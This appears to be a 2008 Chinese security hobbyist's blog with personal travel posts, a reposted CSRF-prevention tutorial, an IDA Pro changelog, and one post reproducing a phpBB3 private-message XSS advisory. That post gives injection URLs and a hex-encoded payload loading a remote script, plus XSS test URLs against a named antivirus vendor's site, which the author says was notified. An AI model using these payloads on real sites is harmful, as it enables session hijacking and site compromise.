召唤

做了一回伪歌迷~

2008-09-22T22:42:35+08:00

听证书说elva萧亚轩做客百度，其实不是她的歌迷，只不过以前听过她几首歌比较动听，而且这张专辑(《三面夏娃》)确实写得不错，推荐一下《类似爱情》和《冲动》。貌似以前还没见过她本人，所以混进去拍一下，嘿嘿，见了本人才知道皮肤和身材那真不是盖的。

这个手拍得很灵异~

最后一起合了张影~ 就不PO上来了~ 感谢朋友爱情证书和百度娱乐杨嘉~

逛街·随手拍的~

2008-09-22T22:36:27+08:00

因为我们家小w对王府井步行街的这个教堂情有独钟，路过拍两张~

@上海

2008-09-14T22:41:03+08:00

  回北京几天了，整理一下上海行的照片，因此行主要不是在玩，所以只去了城隍庙&外滩这一片，为避免日后懒惰荒于梳理，借假期三天——中秋佳节之际BLOG一下。

  到上海的飞机晚点，刚下飞机就匆忙打车到公司（前面省略排队候车20分钟#-_-!!），天公不作美，大暴雨，路上的积水将近20厘米厚，南方就是这么滋润啊，让我顿时倍感亲切:O 司机师傅说星期五很多公司提早下班或者不上班，又下雨，交通一定是非常之堵。印象中是很久很久才到公司，司机师傅又把3号楼错认为是第3期楼，后来san哥跟我说原来SystEm32来的时候貌似也停这里，所以我一直怀疑是不是跟SystEm32坐的一辆车。。

  san哥打着伞在门口接我，挖，终于见到崇拜已久的san师傅了，穿着nsfocus的黑色T恤，因为san哥素来低调，就不描述太多以免被K，膜拜一下 ^.^  进了会议室后san哥拿了些巧克力和饼干给我，因为中午在飞机上随便吃了点，旅途劳累啊，还真有点饿了:P  然后就是久仰的cnhawk师傅，就跟他聊起天来，而且我发现cnhawk师傅是跟谁聊都能让对方觉得非常开心的，HOHO。面试的时候SystEm32来了，32是一个很好的兄弟，只比我大三岁，但技术功底非常扎实，用CC总的话说，技术很好，小伙子很帅，呵呵，崇拜啊。。认识了一个很好的兄弟：）

  晚上部门领导请大家吃饭，……省略N字，平时很少喝酒，不胜酒力啊。。。Orz（算是明白32为什么有意要加强喝酒训练了）晕忽忽的跟san哥回家了，就记得打车时等了很久都不等不到。

  这些天都住在san哥家，还是复式的房子，很宽敞，一个精致的小楼梯通2层，我自己住一间，很舒服，哈哈，有机会上楼梯看看，san哥和嫂子很照顾我又很客气，真的觉得很不好意思，早知道星期一过来就好了，给san哥夫妇添了不少麻烦啊..

  恩。。嫂子做的鱿鱼和绿豆稀饭非常好吃:P

  想到哪就说到哪吧。。呵呵，星期天，没什么事，san哥带我在上海到处逛逛，顺便吃点小吃。我们就到城隍庙附近落脚，这一带应该还是外地人多些，上海老街嘛，大多数是来旅游的，装扮得细致古朴，很有特色，Keywords：古玩、茶、书画、老字号、客栈、购物街、小吃街……

  这里的店铺名字也别具旧上海风格，特别需要提起的是san哥发现的一个名叫“春风得意楼”的茶馆，令人浮想联翩啊～

  接着我们步行到了外滩，穿过一个小公园（公园尽头是一个咖啡厅，咖啡厅底部是一个循环过滤的池子，里面养了很多很多漂亮锦鲤，乐坏我了，我喜欢的鱼儿们啊！下次再来看你们:p ）就来到了浦江大桥，对面的东方明珠电视塔等标志性建筑就清晰的展现在了面前，可惜还是有一段距离，不然可以拍得很清楚：）

  黄浦江

  san哥好像更在意后面这些即将被拆迁的建筑，的确，非常具有异国特色的设计。

  在回去的路上我们经过一处美丽的胡同，这里的街道是以省份的名字命名的，街道很干净，红绿灯旁边还有小小的鱼池，里面也有很多漂亮的小鱼，街道上一棵棵法国梧桐，很有feeling。。。

  我们回去时的地铁，就是在这栋大楼下层的

  说起地铁，就不得不说北京和上海，倒是觉得上海的地铁还好，虽然也挤，但貌似跟北京的地铁还不是一个级别的。如果有人说上海的地铁能把人挤流产，那北京的地铁就能挤怀孕。

  最后感谢san哥和cnhawk师傅送我，最近一直都是在麻烦san哥，所以心里感到特别的愧疚，将来一定不能辜负了san哥对我的一片期望才是，特别是hawk师傅还不放心我，频频回头招手与道别，想起来依然历历在目，感谢。

  总之对师傅们的感谢藏在我心中，在学校剩下的时间里要潜心学习、研究，思考好今后的研究方向。

  相信我们有这么好的团队，这么多优秀的专家，一定会越来越灿烂辉煌，上海，2009年，我们再见：）

[ZZ]防止CSRF攻击

2008-09-04T17:27:44+08:00

转一篇不错的文章,不是很新,有些地方可以看一看:)
《防止CSRF攻击》< rong>
译者:韩国峰
本文已经获得原作者Email授权----译者注
概览：

1. Hello World
2. 介绍
3. 关于认证技术
3.1 Cookies Hashing
3.2 HTTP来路
3.3 验证码
4. 一次性令牌
5. 最后的话
1.Hello World

欢迎来到崭新的Playhack.net的新季度开题项目报告。我非常高兴您能够再次回来让我们的c001项目重现。

希望您能喜欢这个新的短篇论文，我邀请你浏览位于http://www.playhack.net的全部新项目。

开始：几乎没有什么，只是一点香烟!:

呐喊：我向我的playhack m8s null,omni,god and emdel,ofc o str0ke大声呐喊!NEX 回来了。
2.介绍

我对跨站请求伪造（Cross Site Request Forgery，即CSRF）技术有一定研究，但是对网站开发者应当采取的措施研究不深。这些日子在编写一个对用户和管理员（这些人对他们的任务并不明晰:P）有高度安全要求的分布式网站程序时，我被这个话题深刻的纠缠了。

针对这种情况，我必须考虑程序最终可能受到的各个方面的可能的攻击威胁。

给我最多麻烦的就是Session欺骗（或者CSRF，你可以按照自己喜欢的方式称呼），因为这种攻击是完全以用户的身份，因此并没有百分百的可能性来防止它。

如果你对我刚才说所的Session欺骗并不太了解，那么你可以阅读：http://www.playhack.net/view.php?id=30
3.可行措施

Ok，从这里开始，我必须假定你对Session欺骗攻击的实施方法已经深刻领会了:P

让我们开始新的继续。

考虑到一个已经登录到网站的受信用户可以完成一些重要的或者私密的操作，攻击者尝试记性一个可能的登录攻击（但是大多数情况下是不可行的）并且得到已经登录用户的Session来实现其巧妙的行为。

为了劫持用户的Seession，入侵者精心构造一个适当的网页，在这个网页中包含了隐藏的JavaScript函数来重新创造一个原始操作表单，但是攻击者却修改了一些表单值，然后攻击者让受攻击者访问该页面，此时页面加载过程会提交上述表单到一个远程页面，以隐秘地完成一个请求（此时受攻击者并不知道），他们用这种方法利用了用户的受信身份。

这种方式简单解释了Session欺骗攻击是如何工作的，但是一个重要的问题是，"我如何避免我的用户成为这种攻击的受害者？"

现在，你可能想到如下的几种方法：

检查Cookies凭据
检查HTTP请求来路
使用验证码
但是经过一些尝试，你会发现这些方法不是我们应当采取的最合适的解决方式，让我们一个个的来看为什么。
3.1 Cookies Hashing

第一个方案可能是解决这个问题的最简单和快捷的方案了，因为攻击者不能够获得被攻击者的Cookies内容，也就不能够构造相应的表单。

这个问题的实现方法与下面的类似。在某些登录页面我们根据当前的会话创建Cookies：
程序代码

// Cookie value
$value = "Something from Somewhere";
// Create a cookie which expires in one hour
setcookie("cookie", $value, time()+3600);
?>
在这里，我们在Cookies中使用了散列来使得这个表单可被认证。
程序代码

// Hash the cookie
$hash = md5($_COOKIE['cookie']);
?>

">

此时，后台的动态网页部分可以进行如下操作：
程序代码

// Check if the "check" var exists
if(isset($_POST['check'])) {
$hash = md5($_COOKIE['cookie']);
// Check if the values coincide
if($_POST['check'] == $hash) {
do_something();
} else {
echo "Malicious Request!";
}
} else {
echo "Malicious Request!";
}
?>
事实上，如果我们不考虑用户的Cookies很容易由于网站中存在XSS漏洞而被偷窃（我们已经知道这样的事情并不少见）这一事实，这是一个很好的应对对 CSRF的解决方案。如果我们为用户的每一个表单请求中都加入随机的Cookies，那么这种方法会变得更加安全，但是这并不是十分合适。
3.2 HTTP来路

检测访问来路是否可信的最简单方法是，获得HTTP请求中的来路信息（即名为Referer的HTTP头--译者注）并且检查它来自站内还是来自一个远程的恶意页面：这是一个很好的解决方法，但是由于可以对服务器获得的请求来路进行欺骗以使得他们看起来合法，这种方法不能够有效防止攻击。

让我们来看看为什么这并不是一个合适的方法。

下面的代码展示了HTTP Referer实现方法的一个例子：
程序代码

if(eregi("www.playhack.net", $_SERVER['HTTP_REFERER'])) {
do_something();
} else {
echo "Malicious Request!";
}

这个检测则会轻易的忽略掉来自某个攻击者伪造的HTTP Referer欺骗，攻击者可以使用如下代码：

header("Referer: www.playhack.net");

或者其他在恶意脚本中伪造HTTP头并发送的方法。

由于HTTP Referer是由客户端浏览器发送的，而不是由服务器控制的，因此你不应当将该变量作为一个信任源。
3.3 验证码

另外一个解决这类问题的思路则是在用户提交的每一个表单中使用一个随机验证码，让用户在文本框中填写图片上的随机字符串，并且在提交表单后对其进行检测。

这个方法曾经在之前被人们放弃，这是由于验证码图片的使用涉及了一个被称为MHTML的Bug，可能在某些版本的微软IE中受影响。

你可以在Secunia的站点上获得关于此缺陷的详细信息：http:/ cunia.com/advisories/19738/ 。

这里是Secunia关于此Bug解释的概述：

"此缺陷是由于处理"mhtml:"的URL处理器重定向引起的。它可以被用来利用从另外一个网站访问当前的文档"

在同一个页面你会找到来自Secunia工作人员的网站测试方法。

事实上，我们知道，这个Bug已经被微软放出的Windows XP和Windows Vista及其浏览器IE6.0的修复包所解决了。

即使他的确出现了安全问题，这么长时间也会有其他的可靠方案出现。

4.一次性令牌

现在让我们来看经过研究，我希望介绍的最后一种解决方案：在使用这些不可靠的技术后，我尝试做一些不同然而却是更有效的方法。

为了防止Web表单受到Session欺骗（CSRF）的攻击，我决定检测可能被伪装或伪造的每一个项目。因此我需要来创造一次性令牌，来使得在任何情况下都不能够被猜测或者伪装，这些一次性令牌在完成他们的工作后将被销毁。

让我们从令牌值的生成开始：
程序代码

function gen_token() {
// Generate the md5 hash of a randomized uniq id
$hash = md5(uniqid(rand(), true));
// Select a random number between 1 and 24 (32-8)
$n = rand(1, 24);
// Generate the token retrieving a part of the hash starting from
// the random N number with 8 of lenght
$token = substr($hash, $n, 8);
return $token;
}
?>

PHP函数uniqid()允许web开发者根据当前的时间（毫秒数）获得一个唯一的ID，这个唯一ID有利于生成一个不重复的数值。

我们检索相应ID值的MD5散列，而后我们从该散列中以一个小于24的数字为开始位置，选取8位字母、

返回的$token变量将检索一个8位长的随机令牌。

现在让我们生成一个Session令牌，在稍后的检查中我们会用到它。
程序代码

function gen_stoken() {
// Call the function to generate the token
$token = gen_token();
// Destroy any eventually Session Token variable
destroy_stoken();
// Create the Session Token variable
session_register(STOKEN_NAME);
$_SESSION[STOKEN_NAME] = $token;
}
?>
在这个函数中我们调用gen_token()函数，并且使用返回的令牌将其值复制到一个新的$_SESSION变量。

现在让我们来看启动完整机制中为我们的表单生成隐藏输入域的函数：

程序代码

function gen_input() {
// Call the function to generate the Session Token variable
gen_stoken();
// Generate the form input code
echo "value=\"" . $_SESSION[STOKEN_NAME] . "\"> ";
}
?>
我们可以看到，这个函数调用了gen_stoken()函数并且生成在WEB表单中包含隐藏域的HTML代码。

接下来让我们来看实现对隐藏域中提交的Session令牌的检测的函数：

程序代码

function token_check() {
// Check if the Session Token exists
if(is_stoken()) {
// Check if the request has been sent
if(isset($_REQUEST[FTOKEN_NAME])) {
// If the Form Token is different from Session Token
// it's a malicious request
if($_REQUEST[FTOKEN_NAME] != $_SESSION[STOKEN_NAME]) {
gen_error(1);
destroy_stoken();
exit();
} else {
destroy_stoken();
}
// If it isn't then it's a malicious request
} else {
gen_error(2);
destroy_stoken();
exit();
}
// If it isn't then it's a malicious request
} else {
gen_error(3);
destroy_stoken();
exit();
}
}
?>
这个函数检测了$_SESSION[STOKEN_NAME]和$_REQUEST[FTOKEN_NAME]的存在性（我使用了$ _REQUEST方法来使得GET和POST两种方式提交的表单变量均能够被接受），而后检测他们的值是否相同，因此判断当前表单提交是否是经过认证授权的。

这个函数的重点在于：在每次检测步骤结束后，令牌都会被销毁，并且仅仅在下一次表单页面时才会重新生成。

这些函数的使用方法非常简单，我们只需要加入一些PHP代码结构。

下面是Web表单：
程序代码

session_start();
include("functions.php");
?>

下面是解决的脚本代码：
程序代码

session_start();
include("functions.php");

// Call the function to make the check
token_check();

// Your code
...
?>
你可以看到，实现这样一个检测是十分简单的，但是它可以避免你的用户表单被攻击者劫持，以避免数据被非法授权。
5.结论

让我们对这篇简短的论文做一个结论，你的Web应用程序没有百分百的安全，但是你可以开始避免绝大多数普通的攻击技术。

我希望您关注的另一个要点是，Web开发者不应当忽视一般的程序错误（例如XSS 浏览器漏洞等等），不将这些考虑为对您的用户的潜在威胁是一个巨大的错误：你应该永远记得它们将影响程序的信任性、安全性和互操作性。

Cya!

nexus

还有LGN21ST的一篇< rong>
从Rails 2开始，默认使用cookie来保存session，于是很多关于安全上的置疑被频繁提及。尤其是cross-site request forgery(CSRF)攻击。

在Rails2中预防CSRF其实很容易，首先确保在application.rb中包含protect_from_forgery调用
程序代码
Ruby代码
class ApplicationController < ActionController::Base
  protect_from_forgery
end

class ApplicationController < ActionController::Base
  protect_from_forgery
end

至此，所有用form_for或者form_tag等生成的表单均被隐藏注入一个特别的基于用户session生成的token，在表单被提交时一并将token提交至服务器并接受服务器端的检查。

如果你象我一样喜欢自己手写Ajax Post请求代码，但是没有包含这个token的话，服务器端会报'verify_authenticity_token'错误，如何得到这个token呢？我的做法是在页面头部先得到这个token，赋值给一个JS的全局变量，在之后的Ajax代码中就可以直接引用啦，主意，一定要在Ajax调用代码之前作这一步，最保险的位置是在页面第一行。
程序代码
Ruby代码
<%= javascript_tag "var authenticity_token = '#{form_authenticity_token}';" %>

<%= javascript_tag "var authenticity_token = '#{form_authenticity_token}';" %>

Ajax代码大概可以这样写
程序代码
Ruby代码
new Ajax.Request(
  request_path,
  {method:'post',
   parameters:'authenticity_token=' + encodeURIComponent(authenticity_token)});

二版科技寄来的NOD32安全套装

2008-08-22T15:37:28+08:00
本来收到东西应该是很exciting的事情，但是因为某国内知名快递公司—X通快递< rong>的原因，出现了以下抽象效果，特此拍照。
充分验证了国内快递公司暴力运输的事实，绝对是对经典力学的运用，怪不得网上流传：有一个分尸案，其实杀人者本来并没有分尸，只是把尸体用X通快递寄出去后....分尸案就产生了。< rong>

还好里面的东西没坏，内附光盘1、readme、环保袋1

虽然对我来说并没有很大的实际用处，但送给MM是没戏了~

准备把照片给王总看看，晚上有空再分析一下激活系统。

XSS Private Messagging On PhpBB3(0day)

2008-08-18T10:22:14+08:00
################################################## ####################################
# #
# Authors: Dante90, WaRWolFz Crew #
# T0T4L, Ex Member Crew #
# Title: XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# Description: XSS (Cross Site Scripting), Grab Status: 100%. #
# #
################################################## ####################################
XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8]< rong>

程序代码
http://TRAGET/ucp.php?i=pm&mode=compose&action=reply&f=[xss]&p=6779

Where is:

程序代码
[xss] = '';!--"=&{(alert(1))}

Redirect Code [Ascii --> Hex]:

程序代码
[xss] = %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3 a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f% 72%67%2f%66%69%6c%65%2e%6a%73%3e
(

程序代码
http://www.nod32cn.com/default.php?id=181&p=24&searchword=alert(/xss/)%3B

程序代码
http://www.nod32cn.com/default.php?id=181&p=24&searchword=%3C/xss/*-* yle=xss:e/**/xpression(alert(/xss/))%3E

已经上报NOD32。
PS：第一个图截得挺有意思~ 当时没发现~

IDA Pro 5.3 feature list

2008-07-17T11:37:07+08:00
IDA Pro 5.3 feature list

New and improved debugger
The previous version of IDA Pro did not add anything to the debugger and we felt it is time for changes. We reimplemented the debugger core and improved the debugger modules.

The new debugger is more efficient and has better support for multithreaded applications. Breakpoint handling is faster, more logical and less deadlocking. Exception handling is more user friendly.

The debugger servers are multithreaded: they can handle multiple debug sessions, no need to kill a hung server or run multiple copies.

Debugger modules
We added two new debugger targets:

iPhone debugger. Click here for the details.
Symbian OS debugger. Click here for the details.

We publish the source code of all debugger modules.

The Linux debugger module has been improved to support multithreaded applications. We support NPTL based kernels.
Better analysis for PC and ARM
The most important improvements include support for PIC addressing modes, more jump tables and many other useful patterns. In practice this means that the output for iPhone/iMac/Linux/Symbian applications greatly improves. Please refer to the comparison page for more details.
New PDB plugin
The new plugin extracts all name and type information from a PDB file and imports it into the database. The difference is spectacular.
New TILIB utility
This small and nifty utility allows you to create your own type libraries. The Load C header command in IDA Pro could be used to load them in the past. The TILIB utility is easier to use and gives you more control. It also can import preprocessor symbol information.
Support for third party languages
Interested parties may register their own language interpreter (perl/python/ruby - you name it) to be used as the expression evaluator in IDA. This will allow you to use your favorite language everywhere in IDA.
Signatures
As usual, the new release comes with updated signatures, type libraries, ids files, etc. Namely, we updated them for the latest Visual Studio, Intel, and Borland compilers.

PROCESSOR MODULES
+ 6812: added support for HCS12X (thanks to Alex Bratovic)
+ ARM: 'mov' macro can consists of multiple (more than 2) instructions (igor)
+ ARM: "stmfd/sub sp,sp" is considered as a typical code sequence; this improved the listing
+ ARM: added support for signed byte element jump tables
+ ARM: better automatic arm/thumb mode switch
+ ARM: better detection of BL as sub or jump
+ ARM: DCQ means quadro word
+ ARM: ida knows that R7 is used as frame pointer in thumb mode
+ ARM: ida was leaving wrong targets of glue code intact, now it always fixes them; this may eventually modify a user-defined offset but we are certain that this is a good thing to do
+ ARM: more jump table variants are recognized
+ ARM: more glue code and thunk functions are detected
+ ARM: MOVL macro has been renamed as MOV to avoid confusion with MOVLS (thumb mode MOV has always the S bit set); this renaming makes it impossible to tell apart the basic MOV instruction and the MOV macro just looking at the text. Please use the instruction sizes to tell them apart.
+ ARM: much better stack pointer tracing
+ ARM: one more .got addressing method is supported
+ ARM: one more pc-relative addressing method is supported
+ ARM: recognize table switches generated by Apple's compiler
+ ARM: reference into the middle of a macro instruction destroys it (analysis improvement)
+ ARM: strip the low bit of thumb code references during offset analysis
+ ARM: thumb mode thunk targets are converted to functions
+ ARM: when the processor module is 100% certain that an offset must be created, it may destroy old database information
+ AVR: added description of AT89C2051 (contribution of an ida user)
+ CLI: if the list of switch targets is too long, it is split into multiple lines
+ CLI: better handling of obfuscated code
+ PC: added detection of check_security_cookie() function for object files
+ PC: added recognition of call+5/pop idiom for PIC code
+ PC: added support for the ud2 instruction
+ PC: added undocumented 3-byte nop instructions (0F 19..0F 1E)
+ PC: automatically recognize .got relative addressing for pic mode elf files
+ PC: better analysis of device drivers
+ PC: better handling of indirect calls by register
+ PC: ida knows that the "alloc_stack" function allocates stack
+ PC: inc/dec sp are taken into account for stack tracing (16-bit segments)
+ PC: indirect calls to noret functions stop the control flow
+ PC: more condition codes and the 'elf' register  can be directly used in idc while the debugger is active
+ PC: more gcc generated jump tables are recognized
+ PC: third operand of imul instruction is never displayed as offset, stkvar or stroff
+ PC: user-specified callee address is used for all addressing modes (before is was used only for indirect register calls)
+ M32R: added support for undocumented form of the STH instruction (@R+ addressing mode)

FILE FORMATS
+ AR: added support for Apple/BSD ar libraries (Igor Skochnisky)
+ ELF: added more SPARC relocations
+ EPOC: added support for Symbian S60 3d edition SIS files
+ EPOC: ids files have been updated for Symbian SDK for S60 3d edition
+ MACH-O: the entry point of packed executables is visible even if it is in the HEADER segment
+ PDB: new pdb plugin: uses new DIA API and handled type information
+ PE: added support for data imports in GCC compiled binaries
+ PE: added support for long segment names (this and many other improvements thanks to Igor Skochinsky)
+ PE: added support for tiny PE files (thanks to Igor Skochinsky)
+ PIC: allow the user to choose the target device at the loading time; added pic18f2620 port definitions
+ environment variable IDA_LOADALL makes ida to load all segments of input file (pe,elf,coff)

KERNEL
+ added logic to avoid creation of too big multichunk functions
+ added an heuristic rule: switch targets can not be separate functions
+ added FPNUM_LENGTH and FPNUM_DIGITS ida.cfg parameters to set the desired floating point representation
+ added more noreturning functions to noret.cfg
+ added notion of enum element width: now enum types can be synchronized with the local type library without information loss; idc functions to handle the enum element width have been added
+ added signatures for the latest VC8, VC9 and UnixInWindows
+ added support for Visual Studio style enum size specification (e.g. enum name:int {...})
+ better handling of zero length bitfields
+ changed behaviour of the IDALOG_SILENT environment variable: it unconditionally suppresses all output to the message window
+ incorrect structure field types are ignored when building type string for the structure
+ new ida.cfg parameter: WORKDIR specifies the directory to create temprary database files; can be used to improve the speed of opening and closing huge databases
+ new idb event: area_cmt_changed; it is generated when a function or segment comment is changed
+ the plugin options specified by -O are accessible to PLUGIN_FIX plugins
+ preprocessor directives can be used in type declarations (e.g. #pragma pack)
+ stricter check of stkvars while guessing function types; this allows us to ignore corrupted stack frames
+ the "generate idc" command knows about patched bytes
+ the meaning of the -P command line switch has been changed: -P+: compress, -P: pack, -P-: unpack the database
+ updated Intel compiler signatures (added support for v10.1)
+ updated Borland BDS signatures and added Delphi 2007 signatures (thanks to Peter Sawatzki)
+ gui: 'rename' command renames the structure field under the cursor if applied to an expression refering to global variable of a structure type; before is was renaming the global variable regardless of the cursor position
+ gui: added support for extra keyboard back/forward buttons
+ 'bool' is accepted in type declarations

IDC & SDK
+ IDC: added ChangeConfig() to modify ida.cfg settings on the fly
+ IDC: added CompileEx() to compile arbitrary IDC scripts from a string
+ IDC: added debugger option to specify how exceptions are handled. possible values: always, only for unknown exceptions, never display a dialog box upon continuation. The default is set to display the dialog box for all exceptions.
+ IDC: added exception defintion functions
+ IDC: added extended forms of AddStrucMember and SetMemberType
+ IDC: added GetEntryName() to get the name of an export outside of the address space of the program
+ IDC: added GetInputMD5()
+ IDC: added ResumeProcess() and WFNE_NOWAIT for GetDebuggerEvent()
+ IDC: added SetInputFilePath()
+ IDC: added Sleep()
+ IDC: SuspendThread/ResumeThread have been added
+ IDC: added Qword() function (64bit version of IDA)
+ SDK: added a plugin to specify switch idiom details (uiswitch)
+ SDK: added coagulate_dref event (occurs when the kernel analyzes a dref or coagulates data)
+ SDK: added more qstring member functions and more types based on qvector/qstring
+ SDK: added qsleep()
+ SDK: added qwstring class for unicode strings
+ SDK: added register_extlang() to register third party expression evaluators
+ SDK: added resolve_typedef2(), it returns the name of the resolved type
+ SDK: added SaveBase() function to save the current idb
+ SDK: added ui_preprocess and ui_postprocess events to intercept ui commands
+ SDK: added xref creation/deletion events
+ SDK: choose_local_type() to choose types from the local type library
+ SDK: choosers can be created without main menu and status bar
+ SDK: exported determine_rtl() and apply_startup_sig() functions
+ SDK: got rid of time_t in the header files because its size is compiler-dependent; we use qtime32_t instead
+ SDK: renamed processor_t::get_jump_target as next_exec_insn; this callback must return the address of the next executed instruction in all cases, not only for jump instructions
+ SDK: set_segm_start/end functions accept SEGMOD_... flags as the last parameter
+ SDK: added get_process_options()
+ SDK: added CH_NOBTNS to suppress all chooser buttons for modal windows

DEBUGGER
+ debugger: added commands to suspend/resume threads
+ debugger: added support for multiple debug names per address; ida will display only the first one in the listing though but other names can be used to refer to the location
+ debugger: CPU window is sleeker, occupies less space on the screen
+ debugger: debugger server kills the application if the server dies for some reason (SIGINT, SIGTERM, etc)
+ debugger: IDA does not steal the window focus when the debugger is controlled from a script or a plugin
+ debugger: if the remote debugger server becomes irresponsive, close the debug session gracefully
+ debugger: more detailed error message about debugger privileges
+ debugger: reimplemented the debugger core. the new core can handle multithreaded apps and is more intelligent with singlestep/breakpoints. it suspends some threads only if it really unavoidable (the previous core was suspending all threads for singlestepping)
+ debugger: the thread window has no main menu and occupies less screen space
+ debugger: we store debugger desktops for different processors separately
+ debugger: 32-bit and 64-bit versions store the default values in different registry keys

BUGFIXES
BUGFIX: 'open selectors window' command was always complaining about failure
BUGFIX: 'text search' would not find anything in user-defined graphs
BUGFIX: "bad declaration" error message could appear while loading some pdb files
BUGFIX: .net cli was incorrectly decoding conv.r4, conv.r8, and conv.r.un instructions
BUGFIX: 64-bit portion of Macho-O files could be proposed to be disassembled by default by 32-bit version of ida
BUGFIX: 64-bit: rebasing the program would leave the relocations in the incorrect sate because of a wrong loader file name
BUGFIX: abstract function prototype with the __spoils keyword could contain some garbage after the keyword
BUGFIX: anonymous structure types could crash ida
BUGFIX: arm: xrefs from byte operands with a displacement could be incorrect
BUGFIX: arrays of partial types (like _BYTE[5]) could not be declared
BUGFIX: binary search for too long string (>1024 bytes) would crash IDA
BUGFIX: calling get_colored_[demangled_]name with too small buffer would lead to fatal error
BUGFIX: closing a chooser window with a middle click on its tab would prevent ida from reopening it in the future
BUGFIX: could crash trying to demangle extremely long names
BUGFIX: could crash trying to refresh a graph view
BUGFIX: could crash when the debugger was launched
BUGFIX: could fail with "not enough memory" trying to open a huge database
BUGFIX: could hang trying to calculate the number of purged bytes
BUGFIX: could not display empty graphs
BUGFIX: could undefine some instructions upon the debugger start
BUGFIX: definition of iphdr structure was wrong in gnuunx.til
BUGFIX: duplicate field names in struct/union declarations were not reported
BUGFIX: envp in main() prototype was declared incorrectly
BUGFIX: epoc: exports of epoc files with versioning support were incorrectly parsed
BUGFIX: esp based stack variables were displayed incorrectly if the frame pointer delta was non-zero
BUGFIX: fatal error could occur at the end of the debugging session (interr:manage_debugger_segments)
BUGFIX: fixed a memory leak in idc interpreter
BUGFIX: functions with EH_prolog could have wrong stack trace
BUGFIX: get_process_qty() would fail if the debugger was not connected to a remote computer; now it automatically establishes connection if necessary
BUGFIX: graph overview window might lose its "topmost" attribute for some reason
BUGFIX: green arrow was displayed incorrectly in wince debugger
BUGFIX: gui: problems with window focus in mdi: right clicking on an inactive graph view would switch the focus to it but right clicking on the window which was active initially would not return focus to it
BUGFIX: gui: there could be garbage at the end of very long disassembly lines
BUGFIX: HEX loader would load garbage if user in the 'word addressing' mode for PIC processor
BUGFIX: huge basic blocks could generate endless "insuffucient resources" dialogboxes in the graph mode
BUGFIX: idc: exception codes and exit codes were signed extended in 64-bit ida
BUGFIX: if a plugin modified a standard struct or enum, the corresponding local type would stay unmodified and out of sync
BUGFIX: if a plugin would create a graph view and would not specify the zoom level, IDA would crash
BUGFIX: if the analysis indicator was disabled, ida would display garbage
BUGFIX: if the user specified java target for non-java input file, ida would quit without cleaning temporary files
BUGFIX: in amd64 elf files R_X86_64_PC32 relocation record  could resolve incorrectly in some cases
BUGFIX: in some very rare cases ida could quit with an error message (trying to analyze a function with an unreachable loop that passes control to other basic blocks reachable from the function entry)
BUGFIX: it was impossible to use 'text search' in user-defined graphs
BUGFIX: linux: IDA could not display unicode strings if the LC/LC_CTYPE environment variables were missing; now it falls back to LANG
BUGFIX: list windows: pressing Ctrl-Enter staying at the last element would cause an access violation
BUGFIX: loading a corrupted til file could crash ida
BUGFIX: m32r: clrpsw tpsw instructions would generate interr
BUGFIX: mac debugger: the error message about the "setgit procmod" requirement was always about mac_server. for local debugger, idal must be setgid procmod, not mac_server.
BUGFIX: macho files had empty 'imports' window
BUGFIX: mc68x16 lbra instruction stops the execution flow but ida was not aware of it
BUGFIX: mentioning debugger plugins as regular plugins in plugin.cfg could lead to a crash
BUGFIX: mips jalx instruction was toggling the mips16 bit at a wrong address
BUGFIX: mips: negative operands could not be converted to offsets
BUGFIX: MIPS16 jalx instruction was decoded incorrectly
BUGFIX: multiple copies of ida could run slowly on multicore cpus
BUGFIX: non-resursive implementation of gdl_graph_t::path because the recursive implementation was running out of stack in some special cases
BUGFIX: old segment name was unusable after a segment renaming
BUGFIX: pc elf files could have vc6win.til file loaded instead of gnuunx.til
BUGFIX: pc: feature bits of bswap instruction were wrong
BUGFIX: pc: some illegal instructions could be disassembled as 'mov' (opcodes C6 and C7)
BUGFIX: PIC: immediate operand of movlw and similar instructions was treated as a signed number
BUGFIX: PPC could not disassemble m[tf]ocrf instructions
BUGFIX: rebasing the database would not update some information (function prologs, etc) for x86 targets
BUGFIX: rebasing the program would not modify its imagebase in the database (no visible consequences, though)
BUGFIX: restarting the debugger could cause a crash if the stack trace window was opened by default
BUGFIX: SDK: intel.hpp, is_segreg() had a bug
BUGFIX: SDK: set_da() had a bug
BUGFIX: some EPOC6 SIS files could not be loaded
BUGFIX: some pic devices were placed in wrong cfg files
BUGFIX: some TMS470 ARM COFF files could not be loaded (the text segment would be skipped)
BUGFIX: some very old databases could not be upgraded
BUGFIX: sorted lists were not refreshed properly
BUGFIX: structure fields of the "structure offset" type were exported incorrectly to IDC file
BUGFIX: structures and enums that were created by importing local types had 'til type' flag which would prevent further synchronization from idb to local til
BUGFIX: switching between target processors in mc68xx was buggy and would lead disassembly problems (6805/6808)
BUGFIX: Symbian9 epoc import parsing was incorrect
BUGFIX: the check of address space limit was incorrect
BUGFIX: the current file offset was displayed incorrectly for processors with unusual byte size
BUGFIX: the cursor position was changing after a debug session
BUGFIX: the debugger was displaying a dialog box on exceptions with "don't stop" flag
BUGFIX: the default alignment was incorrectly set to 4 for 64bit programs (must be 8)
BUGFIX: the graph overview window would not be immediately displayed for user-defined graph views
BUGFIX: the second parameter of the create_struc_member event was wrong
BUGFIX: the stack analysis could fail with a fatal error for huge function with too many stack change points
BUGFIX: there could be some access violations if the Jump() function was repeatedly used from an IDC script
BUGFIX: there were discrepancies between 32-bit and 64-bit versions of IDA
BUGFIX: too long function names could crash ida (while displaying xref information)
BUGFIX: trace results in the file were too wide
BUGFIX: tree layout could crash on some cyclic graphs
BUGFIX: tricore module was not creating xrefs for offset expressions
BUGFIX: user-defined xrefs could be replaced by regular xrefs and then deleted by the kernel
BUGFIX: vmread/vmwrite instructions were decoded incorrectly in 64-bit mode
BUGFIX: when attaching to a process IDA would not properly switch to the debugger desktop
BUGFIX: if the graph layout algorithm failed, the graph would be left in an incorrect state (with temporary nodes)
BUGFIX: 64bit: it was impossible to edit a breakpoint at address > 0xFFFFFFFF
BUGFIX: IDA window title might display garbage after closing a mini database

14/07/2008

http://www.hex-rays.com/idapro/53/index.htm

Looooooong time no update:)

2008-07-16T23:00:55+08:00
  确实又是两个多月没有更新了……
